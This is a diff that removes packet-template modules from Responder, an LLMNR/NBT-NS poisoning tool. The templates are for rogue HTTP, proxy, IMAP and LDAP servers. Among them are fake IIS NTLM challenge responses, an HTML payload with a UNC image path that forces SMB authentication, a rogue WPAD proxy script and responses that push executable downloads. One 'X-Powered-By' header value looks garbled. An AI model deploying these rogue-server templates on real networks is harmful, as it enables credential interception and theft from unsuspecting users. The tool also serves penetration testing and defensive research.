# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
import struct
|
|
||||||
from odict import OrderedDict
|
|
||||||
from base64 import b64decode,b64encode
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
|
|
||||||
#HTTP Packet used for further NTLM auth.
|
|
||||||
class IIS_Auth_401_Ans(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
|
||||||
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
|
|
||||||
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
|
|
||||||
("Type", "Content-Type: text/html\r\n"),
|
|
||||||
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
|
|
||||||
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
|
|
||||||
("Len", "Content-Length: 0\r\n"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
])
|
|
||||||
|
|
||||||
#HTTP Packet Granted auth.
|
|
||||||
class IIS_Auth_Granted(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
||||||
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
|
|
||||||
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
|
|
||||||
("Type", "Content-Type: text/html\r\n"),
|
|
||||||
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
|
|
||||||
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
|
|
||||||
("ContentLen", "Content-Length: "),
|
|
||||||
("ActualLen", "76"),
|
|
||||||
("CRLF", "\r\n\r\n"),
|
|
||||||
("Payload", "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
||||||
|
|
||||||
#HTTP NTLM Auth
|
|
||||||
class NTLM_Challenge(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Signature", "NTLMSSP"),
|
|
||||||
("SignatureNull", "\x00"),
|
|
||||||
("MessageType", "\x02\x00\x00\x00"),
|
|
||||||
("TargetNameLen", "\x06\x00"),
|
|
||||||
("TargetNameMaxLen", "\x06\x00"),
|
|
||||||
("TargetNameOffset", "\x38\x00\x00\x00"),
|
|
||||||
("NegoFlags", "\x05\x02\x89\xa2"),
|
|
||||||
("ServerChallenge", ""),
|
|
||||||
("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
||||||
("TargetInfoLen", "\x7e\x00"),
|
|
||||||
("TargetInfoMaxLen", "\x7e\x00"),
|
|
||||||
("TargetInfoOffset", "\x3e\x00\x00\x00"),
|
|
||||||
("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
|
|
||||||
("TargetNameStr", "SMB"),
|
|
||||||
("Av1", "\x02\x00"),#nbt name
|
|
||||||
("Av1Len", "\x06\x00"),
|
|
||||||
("Av1Str", "SMB"),
|
|
||||||
("Av2", "\x01\x00"),#Server name
|
|
||||||
("Av2Len", "\x14\x00"),
|
|
||||||
("Av2Str", "SMB-TOOLKIT"),
|
|
||||||
("Av3", "\x04\x00"),#Full Domain name
|
|
||||||
("Av3Len", "\x12\x00"),
|
|
||||||
("Av3Str", "smb.local"),
|
|
||||||
("Av4", "\x03\x00"),#Full machine domain name
|
|
||||||
("Av4Len", "\x28\x00"),
|
|
||||||
("Av4Str", "server2003.smb.local"),
|
|
||||||
("Av5", "\x05\x00"),#Domain Forest Name
|
|
||||||
("Av5Len", "\x12\x00"),
|
|
||||||
("Av5Str", "smb.local"),
|
|
||||||
("Av6", "\x00\x00"),#AvPairs Terminator
|
|
||||||
("Av6Len", "\x00\x00"),
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self):
|
|
||||||
##First convert to uni
|
|
||||||
self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
|
|
||||||
self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
|
|
||||||
self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
|
|
||||||
self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
|
|
||||||
self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
|
|
||||||
self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
|
|
||||||
|
|
||||||
##Then calculate
|
|
||||||
CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
|
|
||||||
|
|
||||||
CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
|
|
||||||
|
|
||||||
CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
|
|
||||||
|
|
||||||
# Target Name Offsets
|
|
||||||
self.fields["TargetNameOffset"] = struct.pack("<i", len(CalculateNameOffset))
|
|
||||||
self.fields["TargetNameLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
|
|
||||||
self.fields["TargetNameMaxLen"] = struct.pack("<i", len(self.fields["TargetNameStr"]))[:2]
|
|
||||||
#AvPairs Offsets
|
|
||||||
self.fields["TargetInfoOffset"] = struct.pack("<i", len(CalculateAvPairsOffset))
|
|
||||||
self.fields["TargetInfoLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
|
|
||||||
self.fields["TargetInfoMaxLen"] = struct.pack("<i", len(CalculateAvPairsLen))[:2]
|
|
||||||
#AvPairs StrLen
|
|
||||||
self.fields["Av1Len"] = struct.pack("<i", len(str(self.fields["Av1Str"])))[:2]
|
|
||||||
self.fields["Av2Len"] = struct.pack("<i", len(str(self.fields["Av2Str"])))[:2]
|
|
||||||
self.fields["Av3Len"] = struct.pack("<i", len(str(self.fields["Av3Str"])))[:2]
|
|
||||||
self.fields["Av4Len"] = struct.pack("<i", len(str(self.fields["Av4Str"])))[:2]
|
|
||||||
self.fields["Av5Len"] = struct.pack("<i", len(str(self.fields["Av5Str"])))[:2]
|
|
||||||
|
|
||||||
#HTTP NTLM packet.
|
|
||||||
class IIS_NTLM_Challenge_Ans(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
|
||||||
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
|
|
||||||
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
|
|
||||||
("Type", "Content-Type: text/html\r\n"),
|
|
||||||
("WWWAuth", "WWW-Authenticate: NTLM "),
|
|
||||||
("Payload", ""),
|
|
||||||
("Payload-CRLF", "\r\n"),
|
|
||||||
("PoweredBy", "X-Powered-By: ASP.NC0CD7B7802C76736E9B26FB19BEB2D36290B9FF9A46EDDA5ET\r\n"),
|
|
||||||
("Len", "Content-Length: 0\r\n"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self,payload):
|
|
||||||
self.fields["Payload"] = b64encode(payload)
|
|
||||||
|
|
||||||
#HTTP Basic answer packet.
|
|
||||||
class IIS_Basic_401_Ans(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
|
||||||
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
|
|
||||||
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
|
|
||||||
("Type", "Content-Type: text/html\r\n"),
|
|
||||||
("WWW-Auth", "WWW-Authenticate: Basic realm=''\r\n"),
|
|
||||||
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
|
|
||||||
("Len", "Content-Length: 0\r\n"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
])
|
|
||||||
158
HTTPProxy.py
158
HTTPProxy.py
@@ -1,158 +0,0 @@
|
|||||||
#! /usr/bin/env python
|
|
||||||
# NBT-NS/LLMNR Responder
|
|
||||||
# Created by Laurent Gaffie
|
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
|
||||||
# it under the terms of the GNU General Public License as published by
|
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
|
||||||
# (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful,
|
|
||||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
# GNU General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
import struct
|
|
||||||
from odict import OrderedDict
|
|
||||||
from base64 import b64decode,b64encode
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
#WPAD script. the wpadwpadwpad is shorter than 15 chars and unlikely to be found.
|
|
||||||
class WPADScript(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
||||||
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
|
|
||||||
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
|
|
||||||
("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
|
|
||||||
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
|
|
||||||
("ContentLen", "Content-Length: "),
|
|
||||||
("ActualLen", "76"),
|
|
||||||
("CRLF", "\r\n\r\n"),
|
|
||||||
("Payload", "function FindProxyForURL(url, host){return 'PROXY wpadwpadwpad:3141; DIRECT';}"),
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
||||||
|
|
||||||
class ServerExeFile(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
||||||
("ContentType", "Content-Type: application/octet-stream\r\n"),
|
|
||||||
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
|
|
||||||
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
|
|
||||||
("Server", "Server: Microsoft-IIS/7.5\r\n"),
|
|
||||||
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
|
|
||||||
("ContentLen", "Content-Length: "),
|
|
||||||
("ActualLen", "76"),
|
|
||||||
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
|
|
||||||
("Connection", "Connection: keep-alive\r\n"),
|
|
||||||
("X-CCC", "US\r\n"),
|
|
||||||
("X-CID", "2\r\n"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
("Payload", "jj"),
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
||||||
|
|
||||||
class ServeAlwaysExeFile(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
||||||
("ContentType", "Content-Type: application/octet-stream\r\n"),
|
|
||||||
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
|
|
||||||
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
|
|
||||||
("Server", "Server: Microsoft-IIS/7.5\r\n"),
|
|
||||||
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
|
|
||||||
("ContentDisp", "Content-Disposition: attachment; filename="),
|
|
||||||
("ContentDiFile", ""),
|
|
||||||
("FileCRLF", ";\r\n"),
|
|
||||||
("ContentLen", "Content-Length: "),
|
|
||||||
("ActualLen", "76"),
|
|
||||||
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
|
|
||||||
("Connection", "Connection: keep-alive\r\n"),
|
|
||||||
("X-CCC", "US\r\n"),
|
|
||||||
("X-CID", "2\r\n"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
("Payload", "jj"),
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
||||||
|
|
||||||
class ServeAlwaysNormalFile(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
||||||
("ContentType", "Content-Type: text/html\r\n"),
|
|
||||||
("LastModified", "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
|
|
||||||
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
|
|
||||||
("Server", "Server: Microsoft-IIS/7.5\r\n"),
|
|
||||||
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
|
|
||||||
("ContentLen", "Content-Length: "),
|
|
||||||
("ActualLen", "76"),
|
|
||||||
("Date", "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
|
|
||||||
("Connection", "Connection: keep-alive\r\n"),
|
|
||||||
("X-CCC", "US\r\n"),
|
|
||||||
("X-CID", "2\r\n"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
("Payload", "jj"),
|
|
||||||
])
|
|
||||||
def calculate(self):
|
|
||||||
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
||||||
|
|
||||||
#HTTP Packet used for further NTLM auth.
|
|
||||||
class IIS_Auth_407_Ans(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 407 Authentication Required\r\n"),
|
|
||||||
("Via", "Via: 1.1 SMB-TOOLKIT\r\n"),
|
|
||||||
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
|
|
||||||
("Type", "Content-Type: text/html\r\n"),
|
|
||||||
("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"),
|
|
||||||
("Connection", "Connection: close \r\n"),
|
|
||||||
("PConnection", "proxy-Connection: close \r\n"),
|
|
||||||
("Len", "Content-Length: 0\r\n"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
])
|
|
||||||
|
|
||||||
#HTTP NTLM packet.
|
|
||||||
class IIS_407_NTLM_Challenge_Ans(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 407 Authentication Required\r\n"),
|
|
||||||
("Via", "Via: 1.1 SMB-TOOLKIT\r\n"),
|
|
||||||
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
|
|
||||||
("Type", "Content-Type: text/html\r\n"),
|
|
||||||
("WWWAuth", "Proxy-Authenticate: NTLM "),
|
|
||||||
("Payload", ""),
|
|
||||||
("Payload-CRLF", "\r\n"),
|
|
||||||
("PoweredBy", "X-Powered-By: SMB-TOOLKIT\r\n"),
|
|
||||||
("Len", "Content-Length: 0\r\n"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
])
|
|
||||||
|
|
||||||
def calculate(self,payload):
|
|
||||||
self.fields["Payload"] = b64encode(payload)
|
|
||||||
|
|
||||||
#HTTP Basic answer packet.
|
|
||||||
class IIS_Basic_407_Ans(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
|
||||||
("ServerType", "Server: Microsoft-IIS/6.0\r\n"),
|
|
||||||
("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
|
|
||||||
("Type", "Content-Type: text/html\r\n"),
|
|
||||||
("WWW-Auth", "Proxy-Authenticate: Basic realm=\"ISAServer\"\r\n"),
|
|
||||||
("PoweredBy", "X-Powered-By: ASP.NET\r\n"),
|
|
||||||
("Len", "Content-Length: 0\r\n"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
])
|
|
||||||
@@ -1,55 +0,0 @@
|
|||||||
#! /usr/bin/env python
|
|
||||||
# NBT-NS/LLMNR Responder
|
|
||||||
# Created by Laurent Gaffie
|
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
|
||||||
# it under the terms of the GNU General Public License as published by
|
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
|
||||||
# (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful,
|
|
||||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
# GNU General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
import struct
|
|
||||||
from odict import OrderedDict
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
#IMAP4 Greating class
|
|
||||||
class IMAPGreating(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "* OK IMAP4 service is ready."),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
])
|
|
||||||
|
|
||||||
#IMAP4 Capability class
|
|
||||||
class IMAPCapability(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
])
|
|
||||||
|
|
||||||
#IMAP4 Capability class
|
|
||||||
class IMAPCapabilityEnd(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("Tag", ""),
|
|
||||||
("Message", " OK CAPABILITY completed."),
|
|
||||||
("CRLF", "\r\n"),
|
|
||||||
])
|
|
||||||
238
LDAPPackets.py
238
LDAPPackets.py
@@ -1,238 +0,0 @@
|
|||||||
#! /usr/bin/env python
|
|
||||||
# NBT-NS/LLMNR Responder
|
|
||||||
# Created by Laurent Gaffie
|
|
||||||
# Copyright (C) 2014 Trustwave Holdings, Inc.
|
|
||||||
#
|
|
||||||
# This program is free software: you can redistribute it and/or modify
|
|
||||||
# it under the terms of the GNU General Public License as published by
|
|
||||||
# the Free Software Foundation, either version 3 of the License, or
|
|
||||||
# (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful,
|
|
||||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
||||||
# GNU General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
||||||
|
|
||||||
import struct
|
|
||||||
from odict import OrderedDict
|
|
||||||
|
|
||||||
class Packet():
|
|
||||||
fields = OrderedDict([
|
|
||||||
("data", ""),
|
|
||||||
])
|
|
||||||
def __init__(self, **kw):
|
|
||||||
self.fields = OrderedDict(self.__class__.fields)
|
|
||||||
for k,v in kw.items():
|
|
||||||
if callable(v):
|
|
||||||
self.fields[k] = v(self.fields[k])
|
|
||||||
else:
|
|
||||||
self.fields[k] = v
|
|
||||||
def __str__(self):
|
|
||||||
return "".join(map(str, self.fields.values()))
|
|
||||||
|
|
||||||
|
|
||||||
class LDAPSearchDefaultPacket(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("ParserHeadASNID", "\x30"),
|
|
||||||
("ParserHeadASNLen", "\x0c"),
|
|
||||||
("MessageIDASNID", "\x02"),
|
|
||||||
("MessageIDASNLen", "\x01"),
|
|
||||||
("MessageIDASNStr", "\x0f"),
|
|
||||||
("OpHeadASNID", "\x65"),
|
|
||||||
("OpHeadASNIDLen", "\x07"),
|
|
||||||
("SearchDoneSuccess", "\x0A\x01\x00\x04\x00\x04\x00"),#No Results.
|
|
||||||
])
|
|
||||||
|
|
||||||
class LDAPSearchSupportedCapabilitiesPacket(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("ParserHeadASNID", "\x30"),
|
|
||||||
("ParserHeadASNLenOfLen", "\x84"),
|
|
||||||
("ParserHeadASNLen", "\x00\x00\x00\x7e"),#126
|
|
||||||
("MessageIDASNID", "\x02"),
|
|
||||||
("MessageIDASNLen", "\x01"),
|
|
||||||
("MessageIDASNStr", "\x02"),
|
|
||||||
("OpHeadASNID", "\x64"),
|
|
||||||
("OpHeadASNIDLenOfLen", "\x84"),
|
|
||||||
("OpHeadASNIDLen", "\x00\x00\x00\x75"),#117
|
|
||||||
("ObjectName", "\x04\x00"),
|
|
||||||
("SearchAttribASNID", "\x30"),
|
|
||||||
("SearchAttribASNLenOfLen", "\x84"),
|
|
||||||
("SearchAttribASNLen", "\x00\x00\x00\x6d"),#109
|
|
||||||
("SearchAttribASNID1", "\x30"),
|
|
||||||
("SearchAttribASN1LenOfLen", "\x84"),
|
|
||||||
("SearchAttribASN1Len", "\x00\x00\x00\x67"),#103
|
|
||||||
("SearchAttribASN2ID", "\x04"),
|
|
||||||
("SearchAttribASN2Len", "\x15"),#21
|
|
||||||
("SearchAttribASN2Str", "supportedCapabilities"),
|
|
||||||
("SearchAttribASN3ID", "\x31"),
|
|
||||||
("SearchAttribASN3LenOfLen", "\x84"),
|
|
||||||
("SearchAttribASN3Len", "\x00\x00\x00\x4a"),
|
|
||||||
("SearchAttrib1ASNID", "\x04"),
|
|
||||||
("SearchAttrib1ASNLen", "\x16"),#22
|
|
||||||
("SearchAttrib1ASNStr", "1.2.840.113556.1.4.800"),
|
|
||||||
("SearchAttrib2ASNID", "\x04"),
|
|
||||||
("SearchAttrib2ASNLen", "\x17"),#23
|
|
||||||
("SearchAttrib2ASNStr", "1.2.840.113556.1.4.1670"),
|
|
||||||
("SearchAttrib3ASNID", "\x04"),
|
|
||||||
("SearchAttrib3ASNLen", "\x17"),#23
|
|
||||||
("SearchAttrib3ASNStr", "1.2.840.113556.1.4.1791"),
|
|
||||||
("SearchDoneASNID", "\x30"),
|
|
||||||
("SearchDoneASNLenOfLen", "\x84"),
|
|
||||||
("SearchDoneASNLen", "\x00\x00\x00\x10"),#16
|
|
||||||
("MessageIDASN2ID", "\x02"),
|
|
||||||
("MessageIDASN2Len", "\x01"),
|
|
||||||
("MessageIDASN2Str", "\x02"),
|
|
||||||
("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
|
|
||||||
## No need to calculate anything this time, this packet is generic.
|
|
||||||
])
|
|
||||||
|
|
||||||
class LDAPSearchSupportedMechanismsPacket(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("ParserHeadASNID", "\x30"),
|
|
||||||
("ParserHeadASNLenOfLen", "\x84"),
|
|
||||||
("ParserHeadASNLen", "\x00\x00\x00\x60"),#96
|
|
||||||
("MessageIDASNID", "\x02"),
|
|
||||||
("MessageIDASNLen", "\x01"),
|
|
||||||
("MessageIDASNStr", "\x02"),
|
|
||||||
("OpHeadASNID", "\x64"),
|
|
||||||
("OpHeadASNIDLenOfLen", "\x84"),
|
|
||||||
("OpHeadASNIDLen", "\x00\x00\x00\x57"),#87
|
|
||||||
("ObjectName", "\x04\x00"),
|
|
||||||
("SearchAttribASNID", "\x30"),
|
|
||||||
("SearchAttribASNLenOfLen", "\x84"),
|
|
||||||
("SearchAttribASNLen", "\x00\x00\x00\x4f"),#79
|
|
||||||
("SearchAttribASNID1", "\x30"),
|
|
||||||
("SearchAttribASN1LenOfLen", "\x84"),
|
|
||||||
("SearchAttribASN1Len", "\x00\x00\x00\x49"),#73
|
|
||||||
("SearchAttribASN2ID", "\x04"),
|
|
||||||
("SearchAttribASN2Len", "\x17"),#23
|
|
||||||
("SearchAttribASN2Str", "supportedSASLMechanisms"),
|
|
||||||
("SearchAttribASN3ID", "\x31"),
|
|
||||||
("SearchAttribASN3LenOfLen", "\x84"),
|
|
||||||
("SearchAttribASN3Len", "\x00\x00\x00\x2a"),#42
|
|
||||||
("SearchAttrib1ASNID", "\x04"),
|
|
||||||
("SearchAttrib1ASNLen", "\x06"),#6
|
|
||||||
("SearchAttrib1ASNStr", "GSSAPI"),
|
|
||||||
("SearchAttrib2ASNID", "\x04"),
|
|
||||||
("SearchAttrib2ASNLen", "\x0a"),#10
|
|
||||||
("SearchAttrib2ASNStr", "GSS-SPNEGO"),
|
|
||||||
("SearchAttrib3ASNID", "\x04"),
|
|
||||||
("SearchAttrib3ASNLen", "\x08"),#8
|
|
||||||
("SearchAttrib3ASNStr", "EXTERNAL"),
|
|
||||||
("SearchAttrib4ASNID", "\x04"),
|
|
||||||
("SearchAttrib4ASNLen", "\x0a"),#10
|
|
||||||
("SearchAttrib4ASNStr", "DIGEST-MD5"),
|
|
||||||
("SearchDoneASNID", "\x30"),
|
|
||||||
("SearchDoneASNLenOfLen", "\x84"),
|
|
||||||
("SearchDoneASNLen", "\x00\x00\x00\x10"),#16
|
|
||||||
("MessageIDASN2ID", "\x02"),
|
|
||||||
("MessageIDASN2Len", "\x01"),
|
|
||||||
("MessageIDASN2Str", "\x02"),
|
|
||||||
("SearchDoneStr", "\x65\x84\x00\x00\x00\x07\x0a\x01\x00\x04\x00\x04\x00"),
|
|
||||||
## No need to calculate anything this time, this packet is generic.
|
|
||||||
])
|
|
||||||
|
|
||||||
class LDAPNTLMChallenge(Packet):
|
|
||||||
fields = OrderedDict([
|
|
||||||
("ParserHeadASNID", "\x30"),
|
|
||||||
("ParserHeadASNLenOfLen", "\x84"),
|
|
||||||
("ParserHeadASNLen", "\x00\x00\x00\xD0"),#208
|
|
||||||
("MessageIDASNID", "\x02"),
|
|
||||||
("MessageIDASNLen", "\x01"),
|
|
||||||
("MessageIDASNStr", "\x02"),
|
|
||||||
("OpHeadASNID", "\x61"),
|
|
||||||
("OpHeadASNIDLenOfLen", "\x84"),
|
|
||||||
("OpHeadASNIDLen", "\x00\x00\x00\xc7"),#199
|
|
||||||
("Status", "\x0A"),
|
|
||||||
("StatusASNLen", "\x01"),
|
|
||||||
("StatusASNStr", "\x0e"), #In Progress.
|
|
||||||
("MatchedDN", "\x04\x00"), #Null
|
|
||||||
("ErrorMessage", "\x04\x00"), #Null
|
|
||||||
("SequenceHeader", "\x87"),
|
|
||||||
("SequenceHeaderLenOfLen", "\x81"),
|
|
||||||
("SequenceHeaderLen", "\x82"), #188
|
|
||||||
("NTLMSSPSignature", "NTLMSSP"),
|
|
||||||
("NTLMSSPSignatureNull", "\x00"),
|
|
||||||
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
|
|
||||||
("NTLMSSPNtWorkstationLen","\x1e\x00"),
|
|
||||||
("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
|
|
||||||
("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
|
|
||||||
("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
|
|
||||||
("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
|
|
||||||
("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
||||||
("NTLMSSPNtTargetInfoLen","\x94\x00"),
|
|
||||||
("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
|
|
||||||
("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
|
|
||||||
("NegTokenInitSeqMechMessageVersionHigh","\x05"),
|
|
||||||
("NegTokenInitSeqMechMessageVersionLow","\x02"),
|
|
||||||
("NegTokenInitSeqMechMessageVersionBuilt","\xce\x0e"),
|
|
||||||
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
|
|
||||||
